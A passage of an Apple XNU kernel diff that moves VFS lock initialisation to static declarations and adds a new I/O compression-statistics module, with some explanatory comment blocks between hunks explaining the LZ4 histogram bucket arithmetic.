+static LCK_GRP_DECLARE(vnode_list_lck_grp, "vnode list");
+static LCK_ATTR_DECLARE(vnode_list_lck_attr, 0, 0);
+static LCK_SPIN_DECLARE_ATTR(vnode_list_spin_lock,
+    &vnode_list_lck_grp, &vnode_list_lck_attr);
+static LCK_MTX_DECLARE_ATTR(spechash_mtx_lock,
+    &vnode_list_lck_grp, &vnode_list_lck_attr);
+LCK_MTX_DECLARE_ATTR(pkg_extensions_lck,
+    &vnode_list_lck_grp, &vnode_list_lck_attr);
 
 /* vars for mount lock */
-lck_grp_t * mnt_lck_grp;
-lck_grp_attr_t * mnt_lck_grp_attr;
-lck_attr_t * mnt_lck_attr;
+static LCK_GRP_DECLARE(mnt_lck_grp, "mount");
+static LCK_ATTR_DECLARE(mnt_lck_attr, 0, 0);
 
 /* vars for mount list lock */
-lck_grp_t * mnt_list_lck_grp;
-lck_grp_attr_t * mnt_list_lck_grp_attr;
-lck_attr_t * mnt_list_lck_attr;
-lck_mtx_t * mnt_list_mtx_lock;
-
-/* vars for sync mutex */
-lck_grp_t * sync_mtx_lck_grp;
-lck_grp_attr_t * sync_mtx_lck_grp_attr;
-lck_attr_t * sync_mtx_lck_attr;
-lck_mtx_t * sync_mtx_lck;
-
-lck_mtx_t *pkg_extensions_lck;
+static LCK_GRP_DECLARE(mnt_list_lck_grp, "mount list");
+LCK_MTX_DECLARE(mnt_list_mtx_lock, &mnt_list_lck_grp);
 
 struct mount * dead_mountp;
 
@@ -330,77 +300,6 @@ vfsinit(void)
        int i, maxtypenum;
        struct mount * mp;
 
-       /* Allocate vnode list lock group attribute and group */
-       vnode_list_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       vnode_list_lck_grp = lck_grp_alloc_init("vnode list", vnode_list_lck_grp_attr);
-
-       /* Allocate vnode list lock attribute */
-       vnode_list_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate vnode list lock */
-       vnode_list_spin_lock = lck_spin_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr);
-
-       /* Allocate spec hash list lock */
-       spechash_mtx_lock = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr);
-
-       /* Allocate the package extensions table lock */
-       pkg_extensions_lck = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr);
-
-       /* allocate vnode lock group attribute and group */
-       vnode_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       vnode_lck_grp = lck_grp_alloc_init("vnode", vnode_lck_grp_attr);
-
-       /* Allocate vnode lock attribute */
-       vnode_lck_attr = lck_attr_alloc_init();
-
-#if CONFIG_TRIGGERS
-       trigger_vnode_lck_grp_attr = lck_grp_attr_alloc_init();
-       trigger_vnode_lck_grp = lck_grp_alloc_init("trigger_vnode", trigger_vnode_lck_grp_attr);
-       trigger_vnode_lck_attr = lck_attr_alloc_init();
-#endif
-       /* Allocate per fd vnode data lock attribute and group */
-       fd_vn_lck_grp_attr = lck_grp_attr_alloc_init();
-       fd_vn_lck_grp = lck_grp_alloc_init("fd_vnode_data", fd_vn_lck_grp_attr);
-       fd_vn_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate fs config lock group attribute and group */
-       fsconf_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       fsconf_lck_grp = lck_grp_alloc_init("fs conf", fsconf_lck_grp_attr);
-
-       /* Allocate fs config lock attribute */
-       fsconf_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate mount point related lock structures  */
-
-       /* Allocate mount list lock group attribute and group */
-       mnt_list_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       mnt_list_lck_grp = lck_grp_alloc_init("mount list", mnt_list_lck_grp_attr);
-
-       /* Allocate mount list lock attribute */
-       mnt_list_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate mount list lock */
-       mnt_list_mtx_lock = lck_mtx_alloc_init(mnt_list_lck_grp, mnt_list_lck_attr);
-
-
-       /* allocate mount lock group attribute and group */
-       mnt_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       mnt_lck_grp = lck_grp_alloc_init("mount", mnt_lck_grp_attr);
-
-       /* Allocate mount lock attribute */
-       mnt_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate sync lock */
-       sync_mtx_lck_grp_attr =  lck_grp_attr_alloc_init();
-       sync_mtx_lck_grp =       lck_grp_alloc_init("sync thread", sync_mtx_lck_grp_attr);
-       sync_mtx_lck_attr =      lck_attr_alloc_init();
-       sync_mtx_lck =           lck_mtx_alloc_init(sync_mtx_lck_grp, sync_mtx_lck_attr);
-
        /*
         * Initialize the vnode table
         */
@@ -471,13 +370,6 @@ vfsinit(void)
         */
        vnode_authorize_init();
 
-       /*
-        * Initialiize the quota system.
-        */
-#if QUOTA
-       dqinit();
-#endif
-
        /*
         * create a mount point for dead vnodes
         */
@@ -518,43 +410,43 @@ vfsinit(void)
 void
 vnode_list_lock(void)
 {
-       lck_spin_lock_grp(vnode_list_spin_lock, vnode_list_lck_grp);
+       lck_spin_lock_grp(&vnode_list_spin_lock, &vnode_list_lck_grp);
 }
 
 void
 vnode_list_unlock(void)
 {
-       lck_spin_unlock(vnode_list_spin_lock);
+       lck_spin_unlock(&vnode_list_spin_lock);
 }
 
 void
 mount_list_lock(void)
 {
-       lck_mtx_lock(mnt_list_mtx_lock);
+       lck_mtx_lock(&mnt_list_mtx_lock);
 }
 
 void
 mount_list_unlock(void)
 {
-       lck_mtx_unlock(mnt_list_mtx_lock);
+       lck_mtx_unlock(&mnt_list_mtx_lock);
 }
 
 void
 mount_lock_init(mount_t mp)
 {
-       lck_mtx_init(&mp->mnt_mlock, mnt_lck_grp, mnt_lck_attr);
-       lck_mtx_init(&mp->mnt_iter_lock, mnt_lck_grp, mnt_lck_attr);
-       lck_mtx_init(&mp->mnt_renamelock, mnt_lck_grp, mnt_lck_attr);
-       lck_rw_init(&mp->mnt_rwlock, mnt_lck_grp, mnt_lck_attr);
+       lck_mtx_init(&mp->mnt_mlock, &mnt_lck_grp, &mnt_lck_attr);
+       lck_mtx_init(&mp->mnt_iter_lock, &mnt_lck_grp, &mnt_lck_attr);
+       lck_mtx_init(&mp->mnt_renamelock, &mnt_lck_grp, &mnt_lck_attr);
+       lck_rw_init(&mp->mnt_rwlock, &mnt_lck_grp, &mnt_lck_attr);
 }
 
 void
 mount_lock_destroy(mount_t mp)
 {
-       lck_mtx_destroy(&mp->mnt_mlock, mnt_lck_grp);
-       lck_mtx_destroy(&mp->mnt_iter_lock, mnt_lck_grp);
-       lck_mtx_destroy(&mp->mnt_renamelock, mnt_lck_grp);
-       lck_rw_destroy(&mp->mnt_rwlock, mnt_lck_grp);
+       lck_mtx_destroy(&mp->mnt_mlock, &mnt_lck_grp);
+       lck_mtx_destroy(&mp->mnt_iter_lock, &mnt_lck_grp);
+       lck_mtx_destroy(&mp->mnt_renamelock, &mnt_lck_grp);
+       lck_rw_destroy(&mp->mnt_rwlock, &mnt_lck_grp);
 }
 
 
@@ -676,7 +568,7 @@ vfstable_del(struct vfstable  * vtbl)
        struct vfstable *vcdelp;
 
 #if DEBUG
-       lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
 #endif /* DEBUG */
 
        /*
@@ -727,7 +619,7 @@ vfstable_del(struct vfstable  * vtbl)
        }
 
 #if DEBUG
-       lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
 #endif /* DEBUG */
 
        return 0;
@@ -736,11 +628,11 @@ vfstable_del(struct vfstable  * vtbl)
 void
 SPECHASH_LOCK(void)
 {
-       lck_mtx_lock(spechash_mtx_lock);
+       lck_mtx_lock(&spechash_mtx_lock);
 }
 
 void
 SPECHASH_UNLOCK(void)
 {
-       lck_mtx_unlock(spechash_mtx_lock);
+       lck_mtx_unlock(&spechash_mtx_lock);
 }
diff --git a/bsd/vfs/vfs_io_compression_stats.c b/bsd/vfs/vfs_io_compression_stats.c
new file mode 100644 (file)
index 0000000..d2fee5f
--- /dev/null
@@ -0,0 +1,738 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/cpu_data.h>
+#include <kern/cpu_number.h>
+#include <kern/host.h>
+
+#include <mach/host_priv.h>
+#include <mach/host_special_ports.h>
+#include <mach/host_info.h>
+#include <mach/iocompressionstats_notification_server.h>
+#include <mach/mach_host.h>
+
+#include <sys/mount_internal.h>
+#include <sys/param.h>
+#include <sys/sysctl.h>
+#include <sys/vnode.h>
+#include <sys/vnode_internal.h>
+
+#include <vfs/vfs_io_compression_stats.h>
+
+#include <vm/lz4.h>
+#include <vm/vm_compressor_algorithms.h>
+#include <vm/vm_protos.h>
+
+
+int io_compression_stats_enable = 0;
+int io_compression_stats_block_size = IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE;
+
+#define LZ4_SCRATCH_ALIGN (64)
+typedef struct {
+       uint8_t lz4state[lz4_encode_scratch_size]__attribute((aligned(LZ4_SCRATCH_ALIGN)));
+} lz4_encode_scratch_t;
+
+lz4_encode_scratch_t **per_cpu_scratch_buf;
+uint8_t **per_cpu_compression_buf;
+uint32_t io_compression_stats_cpu_count;
+char *vnpath_scratch_buf;
+
+LCK_GRP_DECLARE(io_compression_stats_lckgrp, "io_compression_stats");
+LCK_RW_DECLARE(io_compression_stats_lock, &io_compression_stats_lckgrp);
+LCK_MTX_DECLARE(iocs_store_buffer_lock, &io_compression_stats_lckgrp);
+
+typedef enum io_compression_stats_allocate_type {
+       IO_COMPRESSION_STATS_NEW_ALLOC = 0,
+       IO_COMPRESSION_STATS_RESIZE = 1
+} io_compression_stats_alloc_type_t;
+
+static void io_compression_stats_deallocate_compression_buffers(void);
+
+struct iocs_store_buffer iocs_store_buffer = {
+       .buffer = 0,
+       .current_position = 0,
+       .marked_point = 0
+};
+
+int iocs_sb_bytes_since_last_mark = 0;
+int iocs_sb_bytes_since_last_notification = 0;
+
+ZONE_DECLARE(io_compression_stats_zone, "io_compression_stats",
+    sizeof(struct io_compression_stats), ZC_NOENCRYPT | ZC_NOGC | ZC_ZFREE_CLEARMEM);
+
+static int
+io_compression_stats_allocate_compression_buffers(io_compression_stats_alloc_type_t alloc_type, uint32_t block_size)
+{
+       int err = 0;
+       host_basic_info_data_t hinfo;
+       mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
+#define BSD_HOST 1
+       host_info((host_t)BSD_HOST, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
+
+       io_compression_stats_cpu_count = hinfo.max_cpus;
+       if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) {
+               assert(per_cpu_scratch_buf == NULL);
+               per_cpu_scratch_buf = kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t *) * io_compression_stats_cpu_count, Z_ZERO);
+               if (per_cpu_scratch_buf == NULL) {
+                       err = ENOMEM;
+                       goto out;
+               }
+               assert(per_cpu_compression_buf == NULL);
+               per_cpu_compression_buf = kheap_alloc(KHEAP_DEFAULT, sizeof(uint8_t *) * io_compression_stats_cpu_count, Z_ZERO);
+               if (per_cpu_compression_buf == NULL) {
+                       err = ENOMEM;
+                       goto out;
+               }
+       }
+       for (uint32_t cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) {
+               if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) {
+                       per_cpu_scratch_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t), Z_ZERO);
+                       if (per_cpu_scratch_buf[cpu] == NULL) {
+                               err = ENOMEM;
+                               goto out;
+                       }
+               } else {
+                       kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]);
+               }
+               per_cpu_compression_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, block_size, Z_ZERO);
+               if (per_cpu_compression_buf[cpu] == NULL) {
+                       err = ENOMEM;
+                       goto out;
+               }
+       }
+       bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer));
+       iocs_store_buffer.buffer = kheap_alloc(KHEAP_DEFAULT, IOCS_STORE_BUFFER_SIZE, Z_ZERO);
+       if (iocs_store_buffer.buffer == NULL) {
+               err = ENOMEM;
+               goto out;
+       }
+       iocs_store_buffer.current_position = 0;
+       iocs_store_buffer.marked_point = 0;
+
+       assert(vnpath_scratch_buf == NULL);
+       vnpath_scratch_buf = kheap_alloc(KHEAP_DEFAULT, MAXPATHLEN, Z_ZERO);
+       if (vnpath_scratch_buf == NULL) {
+               err = ENOMEM;
+               goto out;
+       }
+
+out:
+       if (err) {
+               /* In case of any error, irrespective of whether it is a new alloc or a resize,
+                * deallocate all buffers and fail */
+               io_compression_stats_deallocate_compression_buffers();
+       }
+       return err;
+}
+
+static void
+io_compression_stats_deallocate_compression_buffers()
+{
+       uint32_t cpu;
+       if (per_cpu_compression_buf != NULL) {
+               for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) {
+                       if (per_cpu_compression_buf[cpu] != NULL) {
+                               kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]);
+                               per_cpu_compression_buf[cpu] = NULL;
+                       }
+               }
+               kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf);
+               per_cpu_compression_buf = NULL;
+       }
+
+       if (per_cpu_scratch_buf != NULL) {
+               for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) {
+                       if (per_cpu_scratch_buf[cpu] != NULL) {
+                               kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf[cpu]);
+                               per_cpu_scratch_buf[cpu] = NULL;
+                       }
+               }
+               kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf);
+               per_cpu_scratch_buf = NULL;
+       }
+
+       if (iocs_store_buffer.buffer != NULL) {
+               kheap_free_addr(KHEAP_DEFAULT, iocs_store_buffer.buffer);
+               bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer));
+       }
+
+       iocs_sb_bytes_since_last_mark = 0;
+       iocs_sb_bytes_since_last_notification = 0;
+
+       if (vnpath_scratch_buf != NULL) {
+               kheap_free_addr(KHEAP_DEFAULT, vnpath_scratch_buf);
+               vnpath_scratch_buf = NULL;
+       }
+}
+
+
+static int
+sysctl_io_compression_stats_enable SYSCTL_HANDLER_ARGS
+{
+#pragma unused (arg1, arg2, oidp)
+
+       int error = 0;
+       int enable = 0;
+
+       error = SYSCTL_OUT(req, &io_compression_stats_enable, sizeof(int));
+
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       error = SYSCTL_IN(req, &enable, sizeof(int));
+       if (error) {
+               return error;
+       }
+
+       if (!((enable == 1) || (enable == 0))) {
+               return EINVAL;
+       }
+
+       lck_rw_lock_exclusive(&io_compression_stats_lock);
+       lck_mtx_lock(&iocs_store_buffer_lock);
+       if ((io_compression_stats_enable == 0) && (enable == 1)) {
+               /* Enabling collection of stats. Allocate appropriate buffers */
+               error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_NEW_ALLOC, io_compression_stats_block_size);
+               if (error == 0) {
+                       io_compression_stats_enable = enable;
+                       io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable);
+               } else {
+                       io_compression_stats_dbg("FAILED: setting io_compression_stats_enable to %d", io_compression_stats_enable);
+               }
+       } else if ((io_compression_stats_enable == 1) && (enable == 0)) {
+               io_compression_stats_deallocate_compression_buffers();
+               io_compression_stats_enable = 0;
+               io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable);
+       }
+       lck_mtx_unlock(&iocs_store_buffer_lock);
+       lck_rw_unlock_exclusive(&io_compression_stats_lock);
+
+       return error;
+}
+SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_enable, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_stats_enable, "I", "");
+
+static int
+sysctl_io_compression_block_size SYSCTL_HANDLER_ARGS
+{
+#pragma unused (arg1, arg2, oidp)
+
+       int error = 0;
+       int block_size = io_compression_stats_block_size;
+
+       error = SYSCTL_OUT(req, &block_size, sizeof(int));
+
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       error = SYSCTL_IN(req, &block_size, sizeof(int));
+       if (error) {
+               return error;
+       }
+
+       if (block_size < IO_COMPRESSION_STATS_MIN_BLOCK_SIZE || block_size > IO_COMPRESSION_STATS_MAX_BLOCK_SIZE) {
+               return EINVAL;
+       }
+
+       lck_rw_lock_exclusive(&io_compression_stats_lock);
+
+       if (io_compression_stats_block_size != block_size) {
+               if (io_compression_stats_enable == 1) {
+                       /* IO compression stats is enabled, reallocate buffers. */
+                       error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_RESIZE, block_size);
+                       if (error == 0) {
+                               io_compression_stats_block_size = block_size;
+                               io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size);
+                       } else {
+                               /* Failed to allocate buffers, disable IO compression stats */
+                               io_compression_stats_enable = 0;
+                               io_compression_stats_dbg("Failed: setting io_compression_stats_block_size to %d", io_compression_stats_block_size);
+                       }
+               } else {
+                       /* IO compression stats is disabled, only set the io_compression_stats_block_size */
+                       io_compression_stats_block_size = block_size;
+                       io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size);
+               }
+       }
+       lck_rw_unlock_exclusive(&io_compression_stats_lock);
+
+
+       return error;
+}
+SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_block_size, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_block_size, "I", "");
+
+
+static int32_t
+iocs_compress_block(uint8_t *block_ptr, uint32_t block_size)
+{
+       disable_preemption();
+
+       uint32_t current_cpu = cpu_number();
+       if (!(current_cpu < io_compression_stats_cpu_count)) {
+               enable_preemption();
+               return -1;
+       }
+
+       lz4_encode_scratch_t *scratch_buf = per_cpu_scratch_buf[current_cpu];
+       uint8_t *dest_buf = per_cpu_compression_buf[current_cpu];
+
+       int compressed_block_size = (int) lz4raw_encode_buffer(dest_buf, block_size,
+           block_ptr, block_size, (lz4_hash_entry_t *) scratch_buf);
+
+       enable_preemption();
+
+       return compressed_block_size;
+}
+
+/*
+ * Compress buf in chunks of io_compression_stats_block_size
+ */
+static uint32_t
+iocs_compress_buffer(vnode_t vn, uint8_t *buf_ptr, uint32_t buf_size)
+{
+       uint32_t offset;
+       uint32_t compressed_size = 0;
+       int block_size = io_compression_stats_block_size;
+       int block_stats_scaling_factor = block_size / IOCS_BLOCK_NUM_SIZE_BUCKETS;
+
+       for (offset = 0; offset < buf_size; offset += block_size) {
+               int current_block_size = min(block_size, buf_size - offset);
+               int current_compressed_block_size = iocs_compress_block(buf_ptr + offset, current_block_size);
+
+               if (current_compressed_block_size == 0) {
+                       compressed_size += current_block_size;
+                       vnode_updateiocompressionblockstats(vn, current_block_size / block_stats_scaling_factor);
+               } else if (current_compressed_block_size != -1) {
+                       compressed_size += current_compressed_block_size;
+                       vnode_updateiocompressionblockstats(vn, current_compressed_block_size / block_stats_scaling_factor);
+               }
+       }
+
+       return compressed_size;
+}
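The per-block histogram above divides the compressed size by block_stats_scaling_factor = block_size / IOCS_BLOCK_NUM_SIZE_BUCKETS to pick a bucket. A worked example with the default 4 KiB block size and a hypothetical 16-bucket histogram (the real bucket count is defined in the header, not shown here):

    /*
     * block_size = 4096, IOCS_BLOCK_NUM_SIZE_BUCKETS = 16 (illustrative value)
     *   => block_stats_scaling_factor = 4096 / 16 = 256 bytes per bucket
     *
     * block compresses to  700 bytes -> bucket  700 / 256 = 2
     * block compresses to 3900 bytes -> bucket 3900 / 256 = 15
     * block does not compress (iocs_compress_block() returns 0): it is charged
     * at its full 4096 bytes -> index 16, which the bounds check in
     * vnode_updateiocompressionblockstats() below rejects with EINVAL
     */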
+
+static uint32_t
+log2down(uint32_t x)
+{
+       return 31 - __builtin_clz(x);
+}
+
+/*
+ * Once we get the IO compression stats for the entire buffer, we update buffer_size_compressibility_dist,
+ * which helps us observe distribution across various io sizes and compression factors.
+ * The goal of next two functions is to get the index in this buffer_size_compressibility_dist table.
+ */
+
+/*
+ * Maps IO size to a bucket between 0 - IOCS_BUFFER_MAX_BUCKET.
+ * For size <= 4096 it returns 0 and for size > 1MB it returns IOCS_BUFFER_MAX_BUCKET (9).
+ * For IO sizes in-between we arrive at the index based on log2 function.
+ * sizes 4097 - 8192 => index = 1,
+ * sizes 8193 - 16384 => index = 2, and so on
+ */
+#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN   4096
+#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX   (1024 * 1024)
+static uint32_t
+get_buffer_size_bucket(uint32_t size)
+{
+       if (size <= SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN) {
+               return 0;
+       }
+       if (size > SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX) {
+               return IOCS_BUFFER_MAX_BUCKET;
+       }
+#define IOCS_INDEX_MAP_OFFSET 11
+       return log2down(size - 1) - IOCS_INDEX_MAP_OFFSET;
+}
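Spelling out the mapping get_buffer_size_bucket() implements:

    /*
     * size = 4096    -> 0                                 (at or below the 4 KiB floor)
     * size = 6000    -> log2down(5999)    - 11 = 12 - 11 = 1
     * size = 8192    -> log2down(8191)    - 11 = 12 - 11 = 1
     * size = 8193    -> log2down(8192)    - 11 = 13 - 11 = 2
     * size = 1 MiB   -> log2down(1048575) - 11 = 19 - 11 = 8
     * size > 1 MiB   -> IOCS_BUFFER_MAX_BUCKET
     */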
+
+/*
+ * Maps the compression factor to a bucket between 0 - (IOCS_BUFFER_NUM_COMPRESSION_BUCKETS - 1)
+ */
+static uint32_t
+get_buffer_compressibility_bucket(uint32_t uncompressed_size, uint32_t compressed_size)
+{
+       int saved_space_pc = (uncompressed_size - compressed_size) * 100 / uncompressed_size;
+
+       if (saved_space_pc < 0) {
+               saved_space_pc = 0;
+       }
+
+       /* saved_space_pc lies between 0 and 100, so log2down(saved_space_pc) lies between 0 and 6 */
+       return log2down(saved_space_pc);
+}
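Worked examples of the saved-space bucketing above (note that a buffer with zero savings hands 0 to log2down(), i.e. __builtin_clz(0), whose result is formally undefined):

    /*
     * 64 KiB written, 16 KiB after compression -> 75 % saved -> log2down(75) = 6
     * 64 KiB written, 60 KiB after compression ->  6 % saved -> log2down(6)  = 2
     * 64 KiB written, 62 KiB after compression ->  3 % saved -> log2down(3)  = 1
     */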
+
+void
+io_compression_stats(buf_t bp)
+{
+       uint8_t *buf_ptr = NULL;
+       int bflags = bp->b_flags;
+       uint32_t compressed_size = 0;
+       uint32_t buf_cnt = buf_count(bp);
+       uint64_t duration = 0;
+       caddr_t vaddr = NULL;
+       vnode_t vn = buf_vnode(bp);
+       int err = 0;
+
+       if ((io_compression_stats_enable != 1) || (bflags & B_READ) || (buf_cnt <= 0)) {
+               return;
+       }
+
+       if (!lck_rw_try_lock_shared(&io_compression_stats_lock)) {
+               /* sysctl modifying IO compression stats parameters is in progress.
+                *  Don't block, since malloc might be in progress. */
+               return;
+       }
+       /* re-check io_compression_stats_enable with lock */
+       if (io_compression_stats_enable != 1) {
+               goto out;
+       }
+
+       err = buf_map(bp, &vaddr);
+       if (!err) {
+               buf_ptr = (uint8_t *) vaddr;
+       }
+
+       if (buf_ptr != NULL) {
+               int64_t start = mach_absolute_time();
+               compressed_size = iocs_compress_buffer(vn, buf_ptr, buf_cnt);
+               absolutetime_to_nanoseconds(mach_absolute_time() - start, &duration);
+
+               if (compressed_size != 0) {
+                       vnode_updateiocompressionbufferstats(vn, buf_cnt, compressed_size,
+                           get_buffer_size_bucket(buf_cnt),
+                           get_buffer_compressibility_bucket(buf_cnt, compressed_size));
+               }
+       }
+
+       KDBG_RELEASE(FSDBG_CODE(DBG_VFS, DBG_VFS_IO_COMPRESSION_STATS) | DBG_FUNC_NONE,
+           duration, io_compression_stats_block_size, compressed_size, buf_cnt, 0);
+
+out:
+       lck_rw_unlock_shared(&io_compression_stats_lock);
+       if (buf_ptr != NULL) {
+               buf_unmap(bp);
+       }
+}
+
+static void
+iocs_notify_user(void)
+{
+       mach_port_t user_port = MACH_PORT_NULL;
+       kern_return_t kr = host_get_iocompressionstats_port(host_priv_self(), &user_port);
+       if ((kr != KERN_SUCCESS) || !IPC_PORT_VALID(user_port)) {
+               return;
+       }
+       iocompressionstats_notification(user_port, 0);
+       ipc_port_release_send(user_port);
+}
+
+static void
+construct_iocs_sbe_from_vnode(struct vnode *vp, struct iocs_store_buffer_entry *iocs_sbe)
+{
+       int path_len = MAXPATHLEN;
+
+       vn_getpath(vp, vnpath_scratch_buf, &path_len);
+       /*
+        * The total path length is path_len, but we can only copy out IOCS_SBE_PATH_LEN bytes. We are
+        * interested in the first segment of the path, to try and figure out the process writing to the
+        * file, and in the last segment, to figure out the extension. So, in cases where
+        * IOCS_SBE_PATH_LEN < path_len, copy out the first IOCS_PATH_START_BYTES_TO_COPY bytes and the
+        * last IOCS_PATH_END_BYTES_TO_COPY bytes (the last segment includes the null character).
+        */
+       if (path_len > IOCS_SBE_PATH_LEN) {
+               strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_PATH_START_BYTES_TO_COPY);
+               strncpy(iocs_sbe->path_name + IOCS_PATH_START_BYTES_TO_COPY,
+                   vnpath_scratch_buf + path_len - IOCS_PATH_END_BYTES_TO_COPY,
+                   IOCS_PATH_END_BYTES_TO_COPY);
+       } else {
+               strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_SBE_PATH_LEN);
+       }
+       memcpy(&iocs_sbe->iocs, vp->io_compression_stats, sizeof(struct io_compression_stats));
+}
+
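A worked example of the truncation scheme (the three IOCS_* length constants are defined in a header not shown here; the values below are purely illustrative):

    /*
     * Assume IOCS_SBE_PATH_LEN = 96, IOCS_PATH_START_BYTES_TO_COPY = 64 and
     * IOCS_PATH_END_BYTES_TO_COPY = 32 (illustrative values only).
     *
     * For a 200-byte path, the recorded name is bytes [0, 63] of the path
     * followed by bytes [168, 199] (the final 32 bytes, including the NUL),
     * so the leading directories (which hint at the writing process) and the
     * trailing file extension both survive the truncation.
     */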
+void
+vnode_iocs_record_and_free(struct vnode *vp)
+{
+       int notify = 0;
+       struct iocs_store_buffer_entry *iocs_sbe = NULL;
+
+       if (!lck_mtx_try_lock(&iocs_store_buffer_lock)) {
+               goto out;
+       }
+
+       if (iocs_store_buffer.buffer == NULL) {
+               goto release;
+       }
+
+       assert(iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) <= IOCS_STORE_BUFFER_SIZE);
+
+       iocs_sbe = (struct iocs_store_buffer_entry *)(iocs_store_buffer.buffer + iocs_store_buffer.current_position);
+
+       construct_iocs_sbe_from_vnode(vp, iocs_sbe);
+
+       iocs_store_buffer.current_position += sizeof(struct iocs_store_buffer_entry);
+
+       if (iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) > IOCS_STORE_BUFFER_SIZE) {
+               /* We've reached end of the buffer, move back to the top */
+               iocs_store_buffer.current_position = 0;
+       }
+
+       iocs_sb_bytes_since_last_mark += sizeof(struct iocs_store_buffer_entry);
+       iocs_sb_bytes_since_last_notification += sizeof(struct iocs_store_buffer_entry);
+
+       if ((iocs_sb_bytes_since_last_mark > IOCS_STORE_BUFFER_NOTIFY_AT) &&
+           (iocs_sb_bytes_since_last_notification > IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL)) {
+               notify = 1;
+               iocs_sb_bytes_since_last_notification = 0;
+       }
+
+release:
+       lck_mtx_unlock(&iocs_store_buffer_lock);
+out:
+       /* We need to free io_compression_stats whether or not we were able to record it */
+       bzero(vp->io_compression_stats, sizeof(struct io_compression_stats));
+       zfree(io_compression_stats_zone, vp->io_compression_stats);
+       vp->io_compression_stats = NULL;
+       if (notify) {
+               iocs_notify_user();
+       }
+}
+
+struct vnode_iocs_context {
+       struct sysctl_req *addr;
+       int current_ptr;
+};
+
+static int
+vnode_iocs_callback(struct vnode *vp, void *vctx)
+{
+       struct vnode_iocs_context *ctx = vctx;
+       struct sysctl_req *req = ctx->addr;
+       int current_ptr = ctx->current_ptr;
+
+       if (current_ptr + sizeof(struct iocs_store_buffer_entry) < req->oldlen) {
+               if (vp->io_compression_stats != NULL) {
+                       construct_iocs_sbe_from_vnode(vp, (struct iocs_store_buffer_entry *) (req->oldptr + current_ptr));
+                       current_ptr += sizeof(struct iocs_store_buffer_entry);
+               }
+       } else {
+               return VNODE_RETURNED_DONE;
+       }
